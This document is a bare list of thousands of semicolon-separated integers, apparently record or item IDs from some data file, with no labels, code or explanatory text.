93941;94023;94056;94079;94115;94116;94146;94205;94234;15207;94259;94260;94456;94478;94521;94588;94589;94644;94613;15208;94645;94738;94744;94743;94901;94902;94942;94922;95032;94943;15209;95033;95264;95034;95297;95298;95362;95361;95414;95445;15210;95610;95666;95667;95776;95777;95827;95828;96015;96016;96017;96018;15211;95936;95956;95957;95958;96101;96102;96104;96103;96105;96193;15212;96194;96287;96195;96318;96344;96345;96346;96410;96460;96461;15213;96462;96494;96496;96495;96498;96497;96637;96638;96667;96668;15214;96669;96819;96780;96843;96842;96844;96885;96912;96913;96932;15215;96933;96984;97067;97068;97089;97090;97136;97135;97137;97196;97217;15216;97358;97357;97397;97398;97399;97400;97442;97474;97475;15217;97498;97529;97530;97589;97615;97643;97644;97670;97699;97757;15218;97783;97800;97801;97802;97900;97922;97923;97967;99004;99005;15219;99006;99007;99008;99046;99047;99190;99140;99254;99292;99318;15220;99485;99484;99545;99640;99675;99695;99717;99716;99741;99742;99954;15221;99970;99971;99972;99973;100029;100070;100071;100111;15222;100163;100164;100165;100166;100178;100167;100277;100278;100279;100306;100305;15223;100391;100432;100392;100483;100433;100484;100520;100522;100521;100560;15224;100579;100561;100580;100625;100726;100725;100727;100728;100739;100773;15225;100774;100818;100797;100819;100852;100853;100877;100878;100879;100880;15226;100967;101008;101009;101010;101011;101012;101013;101034;101035;101066;15227;101067;101176;101240;101241;101322;101323;101379;101380;101490;101554;15228;101555;101556;101557;101793;101794;101857;101910;101911;101983;101984;15229;101985;102045;102046;102097;102209;102135;102210;102211;102369;102370;15230;102371;103792;102372;102373;102374;102442;102443;102444;102445;102446;15231;102447;102448;102449;102483;102529;102598;102550;102599;102600;102629;15232;102630;102684;102685;102715;102790;102791;102792;102807;102825;102826;15233;102927;102928;102929;102930;102931;102963;102964;103096;103146;103116;103147;15234;103198;103148;103231;103259;103260;103261;103311;103312;103331;15235;103364;103392;103365;103432;103473;103539;103578;103579;103580;103608;15236;103654;103655;103715;103716;103717;103757;103758;103793;103794;103859;15237;103882;103992;103993;103994;104057;104058;104134;104222;104223;104224;15238;104258;104259;104302;104339;104340;104365;104400;104401;104402;104403;15239;104441;104414;104442;104465;104466;104467;104482;104483;104484;104485;15240;104486;104503;104504;104535;104586;104587;104588;104643;104644;104645;15241;104684;104685;104686;104722;104723;104724;104752;104753;104754;104792;15242;104819;104861;104862;104940;105087;104975;105089;105088;105120;105119;15243;105121;105123;105122;105170;105195;105329;105330;105331;105332;105397;15244;105431;105430;105432;105433;105489;105497;105498;105499;105595;105623;15245;105663;105664;105704;105754;105799;105800;105801;105802;106056;15246;106076;106109;106176;106212;106213;106235;106319;106321;106320;106413;106412;106414;15247;106509;106415;106593;106537;106661;106660;106726;106662;106727;15248;106728;106729;106852;106820;106853;106854;106874;106875;106876;106877;15249;106955;106956;106957;106986;107025;107024;107026;107119;107120;107121;15250;107122;107123;107124;107199;107279;108304;108345;108386;108346;108387;15251;108418;108417;108420;108419;108421;108422;108490;108523;108570;108571;15252;108610;108611;108664;108663;108697;108696;108698;108730;108731;108771;108772;15253;108774;108773;108789;108816;108817;108853;108854;108905;109003;108906;15254;109046;109047;109092;109065;109218;109093;109219;109220;109329;15255;109410;109349;109412;109411;109413;109415;109414;109518;109517;109556;15256;109557;109558;109587;109588;109589;109624;109658;109659;109660;109739;15257;109802;109901;109816;109925;109902;109968;109967;109969;110101;15258;110102;110165;110207;110208;110315;110316;110317;110318;110386;110418;15259;110419;110420;110421;110423;110422;110424;110464;110503;110537;110570;15260;110571;110572;110624;110665;110666;110729;110787;110910;110820;110911;15261;110928;110929;110968;111014;111087;111088;111089;111112;111141;111140;111173;15262;111175;111174;111316;111234;111317;111360;111395;111396;111468;15263;111521;111534;111535;111536;111537;111538;111557;111594;111652;111653;15264;111668;111706;111707;111796;111797;111798;111985;111986;111987;111988;15265;112066;112185;112232;112233;112280;117297;117298;117368;117369;117370;15266;117435;117436;117437;117503;117504;117505;117506;117611;117621;117674;15267;117644;117645;117675;117676;117677;117678;117812;117838;117890;117862;15268;117909;117957;117958;118023;118097;118071;118099;118098;118121;118122;15269;118158;118180;118179;118216;118365;118408;118472;118473;118474;118495;15270;118720;118719;118721;118723;118722;118840;118893;118894;118895;118939;15271;119018;119040;134332;119124;119125;119269;119268;119290;119313;119314;119480;15272;119508;119509;119561;119634;119792;119817;119850;119891;119892;119893;15273;120963;119943;121056;121057;121134;121135;121167;121136;15274;121168;121234;121317;121400;121425;121426;121438;121485;121484;121557;121486;15275;121558;121560;121559;121561;121576;121603;121628;122068;122069;122102;15276;122163;122268;122269;122270;122271;122321;122272;122516;122517;122518;122519;15277;122551;122621;122722;122723;122793;122724;122794;122933;122957;15278;123021;123020;123023;123022;123024;123025;123097;123026;123531;123530;123532;15279;123533;123691;123692;123758;123799;123800;123836;123835;124037;15280;124038;124039;124095;124096;124205;124344;124345;124368;124683;124721;15281;124722;124779;124780;125094;125095;125096;125097;125176;125343;125344;15282;125414;125415;125608;125416;125609;125709;125783;125742;125784;125857;15283;125858;125859;125905;125929;125930;126012;125959;126013;126127;126128;15284;126129;126224;126351;126352;126391;126392;126514;126529;126654;126608;126655;15285;126656;126657;126755;126837;126966;126967;126968;127102;127077;15286;127486;127487;127488;127489;127490;127492;127491;127822;127867;127823;15287;127928;127868;127929;127930;128066;128083;128180;128181;128125;128182;15288;128307;128429;128430;128479;128510;128511;128534;128559;128560;128620;15289;128621;128622;128782;128783;128884;129026;129072;129073;129074;129107;15290;129108;129306;129364;129412;129365;129413;129414;129415;129416;129506;15291;129507;129596;129597;129856;129985;130073;130134;130135;130136;130288;15292;130289;130290;130349;130350;130351;130437;130369;130524;130438;130525;15293;130612;130631;130981;130774;130983;130982;130984;130985;131086;131036;131087;15294;131140;131139;131141;131142;131249;131294;131438;131439;15295;131784;131838;131966;132062;132061;132063;132082;132108;132109;132269;132110;15296;132326;132423;132347;132425;132424;132427;132426;132635;132699;15297;132736;132760;132761;133106;133107;132875;133108;133109;133110;133151;133230;15298;133325;133326;133415;133416;133417;133418;133419;133475;133533;133534;15299;133657;133658;133699;133700;133731;133732;133733;133734;133815;133816;15300;133878;133879;133880;134094;133968;134095;134183;134353;134433;134434;15301;134577;134634;134772;134773;134774;134839;134917;134984;135103;135416;15302;135191;135206;135207;135208;135365;135366;135499;135417;135725;135794;15303;135878;135879;135982;135983;135984;136069;136123;136125;136124;15304;136126;136127;136291;136369;136292;136371;136370;136373;136372;136375;136374;15305;136376;136430;136413;136590;136431;136591;136675;136703;136676;15306;136721;136754;136778;136837;136932;136933;137155;137208;137209;137340;137341;15307;137373;137374;137375;137376;137573;137673;137674;137675;137731;137764;15308;137864;137888;137912;138065;138104;138066;138105;138106;138107;138225;15309;138226;138227;138365;138394;138644;138645;138646;138647;138648;138649;15310;138650;138651;138860;138914;139010;139099;139211;139210;139254;139298;15311;139255;139342;139389;139521;139522;139553;139631;139777;139812;139877;15312;139878;139929;139930;140059;140060;140061;140062;140104;140299;140300;15313;140301;140302;140303;140607;140666;140667;140796;140811;140936;141138;15314;141243;141385;141464;141511;141651;141552;141725;141841;141886;141843;15315;141897;142189;142050;142513;142626;142635;142618;142664;142858;142885;15316;142951;142920;143002;143130;143187;143194;143191;143260;143332;143315;15317;143313;143439;143509;143505;143500;143551;143593;143544;144043;144041;15318;144189;144311;144322;144353;144437;144477;144426;144483;144594;144609;15319;144626;144624;144691;144679;144672;144737;144824;144839;144818;144866;15320;145021;145132;145194;145123;145397;145386;145309;145319;145480;145471;15321;145527;145523;145728;146242;146052;146122;146318;146353;146371;146357;15322;146389;146514;146561;146562;146617;146599;146613;146603;146757;146787;15323;146786;146791;146892;146926;146895;146922;146942;146986;147784;147789;15324;147855;147793;147904;148172;148169;148170;148235;148236;148225;15325;148212;148234;148277;148305;148300;148314;148326;148433;148364;148444;148441;15326;148536;148615;148756;148870;148841;148963;148932;148967;148964;15327;149010;149007;149011;149017;149020;149005;149038;149219;149082;149229;149232;15328;149218;149250;149275;149373;149482;149609;149490;149635;149715;149855;15329;150115;149897;150109;150095;150165;150228;150310;150302;150706;150704;15330;150705;150803;150903;150905;151037;151422;151423;151622;151485;15331;151667;151807;151890;151833;152019;152068;152138;152163;152165;152169;15332;152224;152271;152270;152418;152395;152518;152419;152564;152516;152565;152568;15333;152753;152638;152775;152783;152892;152967;153024;152943;153123;153202;15334;153201;153182;153215;153485;153512;153572;153570;153509;153862;153668;15335;153865;153970;153941;153993;154148;154177;154159;154178;154229;154194;15336;154263;154354;154432;154428;154707;154732;154734;154750;154772;154818;15337;154815;154948;154949;155015;155294;155293;155311;155314;15338;155317;155373;155634;155708;155709;155769;155870;155975;156013;15339;156015;156114;156186;156124;156188;156189;156233;156191;156260;15340;156259;156267;156266;156442;156331;156451;156466;156547;156564;156563;156616;15341;156651;156636;156695;156697;156751;156762;156768;156767;156763;15342;156948;156949;156950;157263;157253;157256;157251;157259;15343;157260;157258;157249;157257;157322;157320;157378;157380;157447;15344;157891;157886;157908;158044;158031;158052;158043;158090;158089;158109;158158;15345;158201;158200;158202;158204;158203;158270;158335;158509;158684;158585;15346;158678;158677;158699;158746;158682;158762;158761;158781;158836;158857;15347;158898;158897;158899;159112;159109;15348;15349;15351;15350;15353;15352;15354;15355;15357;15356;15359;15358;15360;15361;15363;15362;15364;15365;15366;15367;15368;15369;15370;15371;15373;15372;15375;15374;15376;15377;15378;15379;15380;15381;15382;15383;15384;15385;15386;15387;15388;15389;15390;15391;15653;15654;15655;15656;15657;15658;15659;15660;15661;15662;15663;15664;15665;15666;15667;15668;15669;15670;15671;15672;15673;15674;15675;15676;15677;15678;15679;15680;15681;15682;15683;15685;15684;15686;15687;15688;15689;15727;15728;15824;15729;15825;15830;15831;15835;15844;15690;15845;15893;15907;15899;15932;15925;15961;15953;15994;16007;16008;16020;16025;16047;16048;16049;16072;16073;16074;16087;16096;16102;16103;16104;16105;16106;16112;16127;16128;16129;16013;16130;16131;16132;16150;16155;16156;16165;16176;16181;16196;16182;16186;16212;16213;16214;16215;16233;16234;16235;16236;16237;16239;16238;16246;16248;16249;16252;16262;16266;16284;16283;16300;16311;16341;16340;16342;16343;16345;16344;16346;16347;16365;16348;16380;16381;16383;16382;16391;16457;16465;16464;16470;17130;17143;17136;17196;17197;17232;17286;17299;17324;17577;17578;17600;17639;17640;17641;17657;17664;17673;17674;18009;18010;18030;18042;18056;18053;18080;18086;18087;18115;18143;18151;18152;18153;18157;18158;18195;18242;18226;18303;18227;18304;18514;18513;18516;18515;18517;18518;18595;18519;18623;18603;18596;18629;18630;18631;18632;18645;18651;18646;18652;18655;19195;18662;18664;18663;18667;18665;18674;18673;19188;19189;19219;19196;19220;19221;19224;19223;19225;19257;19270;19258;19315;19316;19317;19318;19319;19336;19373;57528;19430;19431;19432;19433;19475;19477;19476;19479;19478;19526;19527;19528;19529;19530;19531;19560;19532;19561;19562;19564;19563;19565;19566;19567;19568;19569;19570;19609;19571;19611;19610;19612;19613;19682;19683;19684;19685;19690;19708;19709;19710;19711;19785;19786;19787;19788;19789;19790;19791;19792;19793;19794;19795;19796;19797;19799;19798;19800;19801;19802;19804;19803;19806;19805;19808;19807;19809;19845;19846;19847;19953;19848;19955;19954;19956;19957;19958;19959;19960;19961;19963;19962;19964;19965;19966;19967;19968;19969;19970;20018;20019;20020;20063;20070;20072;20071;22736;22737;22738;22740;22739;22741;22743;22744;22742;22745;22746;22748;22747;22749;22750;22751;22752;22753;22754;22755;22757;22756;22758;22759;22760;22761;22762;22763;22764;22766;22765;22767;22769;22768;22770;22771;22772;22774;22773;22775;22776;22777;22778;22779;22780;22781;22783;22782;22785;22784;22786;22788;22787;22789;22790;22791;22792;22793;22794;22795;22797;22796;22798;22799;22800;22802;22803;22804;22801;22805;22806;22807;22808;22809;22811;22810;22812;22813;22815;22814;22816;22818;22817;22819;22821;22820;22822;22823;22824;22825;22826;22827;22828;22830;22829;22832;22831;22834;22833;22835;22837;22836;22838;22839;22840;22842;22841;22843;22844;22845;22847;22846;22848;22849;22850;22852;22851;22853;22855;22854;22856;22857;22858;22859;22860;22861;22862;22863;22864;22865;14832;84239;10053;27582;21293;17599;10054;153223;135673;149524;135097;53493;73213;72392;136341;76868;76867;76869;76866;72416;72391;56754;53492;142596;12295;92627;62974;63476;46738;137364;138149;138150;148825;138151;153806;52045;58483;144790;148360;126603;19750;52536;22410;11691;11713;31130;54615;49110;15556;24322;10663;144791;22159;106203;121509;50677;13751;19770;11104;11017;10679;69934;69933;111754;25292;19751;51094;51093;51095;110553;110554;121037;39463;12638;18261;36185;32319;24670;84086;139785;155305;47605;47606;58591;103789;103114;104126;103219;11655;70447;18200;10438;45433;45432;35351;47801;47800;47761;20745;20746;15783;103115;33480;34325;35450;12217;35372;11951;55883;15753;33447;11002;31658;72779;10595;58182;106137;106138;136411;103647;145073;87593;87594;87595;157842;87596;34111;17631;59959;40875;35373;147947;22235;111529;106050;155350;117358;124029;117359;21214;22366;31116;44059;38926;24711;22315;22475;21662;58747;58748;58745;58746;33446;10057;11338;11386;27856;27857;29925;32433;66239;83113;67192;70742;74222;71858;92786;105411;73967;66240;93561;74223;73968;71859;77810;83114;92787;72802;100682;10953;42818;86322;59852;10058;17991;10059;19309;19238;71177;24903;27535;74089;27855;21778;99689;95882;11344;97995;11394;29801;15514;12241;22482;109142;11933;44920;22481;42058;72704;33925;32506;24244;24242;24243;33482;24018;70294;66755;81319;73160;100934;86445;93197;90198;99762;101396;117884;101397;124239;154728;131764;137079;137365;137055;31643;42978;69430;69400;38928;66527;45122;42979;18505;20926;14772;20925;31466;21559;12287;109208;12013;111604;119833;35029;51185;131730;135187;144756;139206;148956;148955;70411;80442;68905;90265;10450;10451;11631;20869;141781;141780;154967;18254;12086;26915;21023;154966;14234;34769;58183;70545;90027;93650;56693;56692;35717;63324;63691;71144;73634;72102;84291;85652;89682;134979;135757;62678;64990;71145;72103;73635;76619;77186;78511;79386;81975;84292;85653;86673;89683;107088;78515;94051;91781;92495;95026;97942;99690;101063;102714;107089;108688;124176;109344;111599;122349;123006;124698;118307;121214;126952;132340;134702;136745;137636;140766;140765;143126;143274;148896;148935;149999;151932;152533;155559;156863;153402;158095;159145;158982;122449;109041;24264;18639;24265;92626;24266;18638;70920;18641;92355;39365;42254;32325;128551;35751;89684;33274;18640;136927;11625;14198;31731;11997;27057;10833;18565;18566;18567;10060;11751;136928;18568;18569;18120;110555;15453;21092;20253;11075;33926;22312;18222;46692;66395;21555;20129;11805;23624;18461;21621;18479;33856;22299;20069;31650;43099;16061;11022;12233;42833;11100;16044;52482;22305;40349;11976;69471;26185;24355;13845;18617;136766;149062;11946;11505;12118;10061;34369;45065;136767;51141;12062;12269;45109;35760;34349;39805;34221;47022;44938;61709;63338;33397;31850;31851;22903;31863;19428;42412;43030;20349;83813;45120;54613;14375;21039;24021;23636;10928;10933;10510;11093;22253;18393;83814;31720;29927;11908;15720;45023;81604;15719;14358;10062;20727;20394;64458;66033;64457;46198;46197;46199;46200;63245;41607;135096;109941;153800;119499;112037;112038;112039;112040;112041;112042;112044;112043;112045;117665;112046;118799;121249;122973;105752;81816;101025;76572;11758;59656;59655;73317;20750;23652;20321;16469;50511;19689;55995;61491;83474;61489;109042;119305;130465;61490;96956;101110;95921;95922;57918;73372;95923;73370;73373;77632;77633;77634;77635;79720;77864;85545;85544;74368;77304;81342;84640;84402;90422;93716;96961;77631;64703;101530;108405;103382;77303;112193;64701;138601;64702;108713;55732;111528;150504;78823;153805;69982;94163;83032;70727;87309;91813;104178;62946;62945;45371;38206;35462;35467;40849;40850;73921;40851;73349;84163;91131;101846;101847;104380;104897;106562;109683;117809;121232;122717;76149;135179;135924;132018;101304;103818;107222;112211;121064;122649;143422;150049;150048;139749;73348;139750;139751;136421;101305;106849;58003;94513;104389;94514;104390;94515;102036;104391;102037;72336;149643;72335;10609;11473;14805;12095;88145;45006;18532;90191;149501;99169;90427;99170;99172;99171;154138;18362;62351;22493;11409;19552;11812;22494;24814;155470;52974;26014;76311;25080;22129;22128;22196;22195;22127;22126;22133;25296;76310;31357;25295;45344;45345;10063;11656;11619;38651;105255;35611;20958;20957;61995;61996;11497;11197;35716;23724;18537;24733;18536;22160;61610;61611;61609;85448;58290;10361;10570;10064;151191;154814;151190;16223;147171;108804;10558;77026;108799;108800;108801;152458;108802;11889;23640;18416;46783;51861;53856;62734;77055;107149;125737;128036;128553;129470;135311;149260;104815;127100;11828;12232;16111;51179;66373;24267;20211;16250;22412;51675;51674;14664;30253;65688;65687;47135;53512;14682;34237;25899;11538;11644;11449;10065;19418;150945;80119;133510;88390;122552;137913;139813;91525;97499;118614;110056;126393;141516;105434;132549;134956;118615;97758;96052;126394;94344;150477;95374;122553;91838;129308;118616;97864;88703;105435;118617;147628;97443;118618;94765;140615;104187;118598;105398;147626;142318;132550;91053;118619;124206;136128;95959;136129;135013;100134;136130;104303;154697;105466;129075;151462;138228;97476;144346;118620;132551;88428;95960;118621;152819;96053;118622;97091;129076;144096;118623;87786;157382;152816;94345;104366;137377;132552;91327;139814;134918;93200;89973;96054;147637;119732;138229;132553;151461;137914;105399;126395;118599;118624;124418;151495;118625;105467;156827;93255;156848;151498;118626;154685;151460;146409;93030;147905;104188;129598;122432;127495;92845;105436;136131;118627;78119;78120;78121;91141;97306;88917;78122;78123;154678;78124;88429;118628;132554;105400;95961;126396;139815;154698;132555;118629;78125;78126;154701;118630;156833;88870;123027;142038;118600;122958;123028;136132;92846;118631;97419;78127;97151;91201;139816;78128;78129;78130;97901;97359;78131;88430;97477;78132;78133;146410;87743;104189;78134;125417;78135;78136;78137;86003;78138;78139;88431;78140;78141;78142;78143;78144;78145;78146;78147;95962;105333;78148;78149;78150;78151;78152;88432;78153;78154;95937;123029;78155;146413;78156;78157;84450;123030;96106;78158;78159;78160;88531;93971;78161;78162;78163;78164;83477;86004;78165;118632;78166;86005;78167;78168;78169;78170;78171;144341;93696;78172;78173;138819;78174;78175;78176;78177;78178;78179;78180;78181;78182;154679;78183;78184;78185;79670;78187;78188;143112;100135;78189;78190;118633;78191;78192;78193;83004;105735;78194;78195;78196;83502;78197;78198;78199;78200;78491;86006;80256;80257;78660;78696;78697;127496;91617;78835;84451;78877;137676;133625;79340;80447;85945;79601;79732;79602;79644;79603;79587;86007;79604;79809;79605;79606;79733;79891;85946;79892;80038;80059;80108;81608;80231;92383;92384;81557;80309;97671;80529;86008;88582;80891;92528;86009;81558;83148;156835;88433;85947;81303;81390;81391;141185;86256;81609;118634;82671;88434;82576;86271;86272;82513;141173;85948;97420;82539;82577;119731;88435;82672;85949;86257;82673;125683;85963;83005;82905;82931;82932;83006;85950;83038;86026;83749;85951;99203;93135;95938;84010;91202;85771;154702;93256;85952;93850;85916;111708;86010;91367;85953;85917;85918;88064;88436;91368;84966;86011;85054;88437;86012;84627;99238;85954;86013;91507;86014;91579;88065;85131;88847;85518;93915;88811;88812;105510;94655;91328;91301;88813;85607;85852;91398;93084;101938;88814;85697;85853;85708;86015;85854;85855;85856;85889;85857;85890;91329;85891;85932;119894;91432;97307;138230;86109;97308;91302;95963;86187;91433;97531;87902;86358;86330;118635;86407;86619;86449;97560;87903;88438;91330;156824;88815;91313;88439;91314;91448;91315;86773;86729;86796;86774;136133;99048;147636;107135;123977;149078;95939;88848;144363;118636;126397;104190;93100;154686;155624;139704;119793;99920;118601;118637;93257;118638;92667;135014;138652;126398;110057;126399;118639;139817;97152;105401;123136;144103;118640;132556;91434;101491;100179;118641;154700;94646;92876;142359;90455;118642;136208;104687;146388;99641;136209;134957;104304;97401;101492;92707;126400;132557;104191;87787;118643;104107;97838;118644;151466;152776;100180;149081;94984;119818;87660;91861;94449;100000;118645;121439;122763;132558;97444;129309;95717;90324;119733;95940;156826;132559;136134;124419;118602;127078;97153;154690;100181;118603;95941;91142;151463;139818;122764;122554;118646;144344;132560;144364;87904;142043;95942;123031;132561;139819;156831;118647;91580;129310;105437;118648;129307;154703;118649;124420;132562;119895;118650;156828;97445;129311;157297;126401;91143;122765;119696;146403;139820;104192;132563;156843;144358;100136;95035;118651;87432;156834;97421;147633;87905;129312;138395;105438;91694;125480;137915;105402;88849;118652;122433;119697;154682;94147;104108;92847;147631;104305;146390;136135;105403;154699;154672;132548;152825;142523;121440;137916;154680;118653;146405;95900;151499;118654;118655;105439;88851;107136;156829;147632;132564;118604;105404;118656;94647;123032;97478;95964;95718;97360;97154;91054;129313;146611;93839;94408;136136;127497;95400;94985;134958;152827;124464;93247;154674;118605;118657;148278;139821;97422;97361;91055;138233;132565;144098;118658;150462;94117;124421;132566;118606;93749;104306;88871;96463;127498;126402;132567;157367;147500;97479;139822;154689;100001;152823;149070;118659;91695;153762;119635;152820;95965;127493;150194;159139;123978;118607;144093;139823;101093;152777;144359;118660;97155;100137;142248;118608;92959;139824;136137;147629;78201;100002;96985;87771;118661;137917;78202;103262;142041;136138;156823;78203;154692;118662;105440;97218;138231;152814;122766;142049;126403;91056;118663;154676;147630;144352;143110;118665;118664;139825;118666;118609;101858;129314;118667;86016;105468;118668;122767;93136;124422;147524;136139;118669;88769;135940;97402;78204;124423;91435;144435;95943;118670;155605;91551;104260;97924;78205;88025;118671;125481;133511;132568;97423;93916;129315;118672;144345;88872;156841;97446;90411;149069;118673;92708;100003;95944;90102;144349;118674;150465;87433;94766;105469;144357;118675;118676;99009;118677;118678;137918;103313;93201;152826;147634;154675;118679;97362;93239;105441;132569;101912;100704;154695;123837;93202;88852;136207;111709;118680;127499;156837;123838;118610;122434;136140;94479;95966;125482;97532;132570;118611;118681;118682;104307;119819;156840;97447;99204;121441;143102;118612;118683;104261;78206;147635;145255;87434;100138;155753;94206;100004;132571;139826;147625;147623;156825;101493;139827;78207;93750;90809;151496;107137;144355;136141;94412;105442;91303;142036;132572;144361;88026;99444;88463;126404;94522;154693;156842;134959;118685;118684;119820;88742;132573;100331;91144;92986;118686;104193;132547;122622;154684;125483;88066;88873;118687;118688;142037;154880;132574;146404;154691;88770;136142;88440;97156;94118;118689;133774;97424;118690;95967;143103;118691;93840;126405;118692;78208;136143;100112;136144;104415;78209;118693;78210;78211;155754;78212;147627;78213;88441;157329;126406;154671;154696;94480;146391;95036;99921;138067;101094;147624;93550;156838;134960;78214;118694;152824;94301;88888;96781;94923;154677;95968;126407;154687;118695;104341;138234;139828;119668;95969;135015;136145;126408;144356;105470;112023;100280;126448;154683;125484;104194;103995;100182;142247;87788;93841;91369;110058;88874;118696;127500;150460;110059;132575;146402;142046;91436;118697;154968;104308;118698;129316;154673;78215;101913;78216;93203;152815;126409;150469;118699;97333;86017;78217;118613;104109;95970;132576;78218;78219;91331;118700;140616;104135;137919;142264;95971;90456;92005;132577;156830;78220;124424;100006;105443;151465;154681;118701;78221;154694;105444;105445;158316;78222;78223;96464;87435;100007;94687;138232;146408;124425;127501;146398;136146;94648;78224;78225;129317;154888;87436;97480;149072;100168;122435;92709;140617;156839;78226;92765;140470;132578;118702;99546;132579;90161;132580;152821;127494;156836;101859;94986;104262;118703;87906;152817;136147;124426;139829;132581;104342;152822;132582;125485;88442;119669;101242;100139;126410;97902;88569;89945;78227;154688;105405;122768;96288;78228;78229;138068;137378;101324;129318;78230;118724;105471;78231;78232;91552;81597;151790;102732;76940;151021;85693;102733;73948;73950;73949;138140;76332;76333;148022;78427;59477;95387;97191;73598;76073;32376;30152;35322;11054;10066;18186;15540;10837;20754;60154;15764;10838;10067;39806;39875;21573;43164;13661;13662;13663;13665;13666;13668;13667;13669;13670;13671;13672;13674;13673;13676;13675;13678;13677;13679;13680;13682;62243;13683;13684;13685;13686;13687;13688;13689;13690;13691;13692;13693;13694;13695;13696;13697;13698;13699;13700;13701;13702;13703;13704;13705;13706;13707;13708;13709;13710;13711;13712;13713;13714;13715;13717;13716;13718;13719;13720;13722;13721;13723;13724;13725;13727;13726;13728;13729;13730;13731;13732;13733;13734;13736;13735;13737;13738;13739;13748;13749;13746;13747;13750;13850;14207;14208;14209;14210;13851;14203;14252;15474;14320;14321;14348;14349;14627;14628;14839;14592;14593;14373;14374;14642;14643;14741;14742;14743;14744;14688;14689;14690;14691;14692;14693;14701;14702;14703;14704;14789;14716;14717;14764;14765;14807;14808;15430;15422;15454;15475;15578;15471;15544;15584;15585;62245;62246;15730;15731;15732;15733;62247;15734;15735;15747;15748;15790;15791;15847;15848;15841;15842;15895;15896;15930;15977;15976;15978;15979;15980;16026;16027;16028;16029;16030;16031;16050;16051;16055;16032;16052;16033;16097;16107;16098;16099;16113;62248;16133;16134;16267;16166;16268;16167;16285;16287;16286;20056;20073;20074;20076;20075;20077;20078;20164;20098;20099;20100;20101;20114;20138;20139;16288;20165;20166;16289;20186;20187;20188;20189;20190;20191;20192;20193;20194;20229;20230;20231;20232;20242;20243;20256;16301;20287;20257;20288;20259;20258;20260;20277;20278;20279;20289;20290;20291;20305;20304;20306;20307;20308;20309;20310;20311;20323;16349;16350;20324;20325;20326;20350;20351;16351;16352;16353;16354;62253;62254;16355;16356;16357;16358;16373;16374;16466;17137;16467;19614;19615;19616;19617;19618;19619;19620;19621;19622;19623;19624;19625;19626;19627;18314;18315;18316;19628;18317;19629;18318;19630;18319;19631;19632;19633;18320;19634;18321;19635;18322;19636;19637;18323;19638;18324;18325;19639;18326;19640;18327;62255;18328;19641;19642;18329;19643;18330;18331;19644;18332;19645;19646;18333;19647;18334;19648;19649;19650;19651;19652;19653;19654;19655;62256;19656;62257;62258;18335;19657;19658;18336;18377;18337;18438;18378;18574;18439;18575;18508;18577;18509;18578;18542;19464;18579;18580;18543;18581;18582;18593;18604;62259;18624;18625;18684;19259;18685;19190;19197;19198;19230;16118;19290;16119;19260;19262;19261;19264;19271;19272;19274;19273;19275;19278;19276;19279;19280;19291;19293;19292;19294;19374;19375;19321;19320;19322;19378;19379;19465;19466;19435;19434;19467;19468;19420;19436;19421;19659;19437;19469;19470;19438;19660;19471;19480;19482;19481;19483;19661;19662;19663;19664;19666;19665;19667;19668;19720;19721;19722;19724;19723;19725;19726;19727;19728;19729;19731;19730;19732;19733;19734;19736;19735;19737;19738;19739;19740;19868;19869;19870;19871;19873;19872;19874;19875;19876;19878;19877;19879;19881;19880;19971;19972;19882;19883;19884;20021;19973;20022;20023;20024;20025;20026;20027;20167;20028;24027;20029;62260;62261;62262;62263;20403;20405;20404;20406;20407;20408;20409;20410;20730;20756;20757;20802;20848;20847;20871;24028;24030;24029;20872;24031;20881;24032;24033;20882;20883;24034;24035;24036;24037;20884;24038;24039;24041;24040;20937;24042;24044;24043;24045;24046;24047;24048;24049;24050;24052;24051;24053;24054;24055;24056;24057;24058;24059;24060;20997;20998;24061;24062;24063;24064;24065;24066;24067;24068;24069;24070;24071;24072;24073;24074;24075;21076;24077;24076;24078;24079;24080;24081;24082;21101;21122;21123;21190;21191;21192;21169;24083;21249;21251;21250;21252;21253;21273;21274;21294;21295;21296;24084;24085;24086;24087;24088;24089;24090;24091;24092;24093;24094;24095;24096;24097;24098;24099;24100;24101;24102;24103;24104;24105;24106;24107;24108;24109;24110;24111;24112;24113;24114;24115;24117;24116;24118;24119;24120;24121;24122;24123;24124;24125;24126;24127;24128;24129;24130;24131;24132;24133;24134;24135;24136;24137;24138;24139;24140;24141;24142;24143;24144;24145;24146;24147;24148;24149;24150;24151;24152;24154;24153;24155;24156;24157;24158;24159;24160;24161;24162;24163;24164;24165;24166;24167;24168;24169;24170;24171;24172;24173;24174;24175;24176;24177;24178;24179;24180;24181;24182;24183;27648;62264;62266;62265;62267;62268;62269;62270;27649;24184;27650;27651;27652;27653;24185;27654;27655;24186;24187;27656;27657;24188;27658;24189;24190;24191;24192;27660;27659;24193;27661;27662;27663;27664;24194;27666;27665;24195;24196;27668;27667;27669;27670;24229;27671;27672;27673;24198;24197;27674;27675;27676;27678;27677;27679;24200;24199;27680;27681;27683;27682;24224;24225;27685;27684;24226;27686;24231;24230;27688;27687;24298;27689;27691;27690;27693;27692;27695;27694;27696;27697;27698;27699;27700;27701;27702;27703;27704;27705;27706;24820;27707;27708;27710;27709;27711;27712;27714;27713;27715;27716;27718;27717;24299;27719;24324;24325;27720;27721;27723;27722;27725;27724;27726;24300;27727;27728;27729;27730;27731;27732;27733;27734;27735;27736;27737;27738;27739;27740;24301;27741;24302;27742;27743;27745;27744;27746;27747;27748;27749;27750;27751;24303;27752;27753;27754;27755;24304;24305;27756;27757;27758;24306;27759;27760;27761;27762;24348;24349;27764;27763;27765;27766;27767;27769;27768;27770;27771;27772;24361;24360;27773;27774;27775;27777;27776;24728;27778;27779;24692;27780;27781;24693;24694;27782;27783;27785;27784;27786;27787;27788;27790;27789;27791;27792;27793;27795;27794;27797;27796;27798;27799;27800;27801;24766;24714;28152;24715;28153;27805;27807;27806;27808;24716;27810;27809;28302;24717;27811;24718;27812;24767;24729;27820;28254;27821;27822;28186;28154;28155;28156;28157;28303;28158;28255;28160;28159;24768;24769;28161;28304;28162;28305;28163;24821;28164;24822;28187;28213;24795;28188;24796;28189;28190;28191;28192;28306;28214;24824;24823;28216;28215;28307;28229;28256;28230;24882;24883;28231;28257;24836;28258;24837;24884;28308;24885;28309;28310;28311;28312;28313;28340;28341;24922;29264;24923;28342;28343;30024;29193;28344;24924;25001;24925;24926;28345;28346;29194;28347;29195;29265;25002;24927;24928;29266;30068;29267;29269;29268;25003;29270;25045;29271;25046;29272;29708;29273;29709;30069;29275;29274;29276;25013;29277;25014;25027;25028;25029;29278;25030;29279;29841;29280;29281;29282;29283;25047;29284;25048;29842;29710;29711;30025;30026;29712;29713;29714;29715;25101;29757;29809;29758;29759;29760;29761;29810;29762;29763;29764;29765;29766;29767;29768;29794;29795;25127;25128;25178;25179;25180;25181;25182;25183;25230;25232;25231;25233;25234;25448;25302;25303;25304;25466;25357;25358;25467;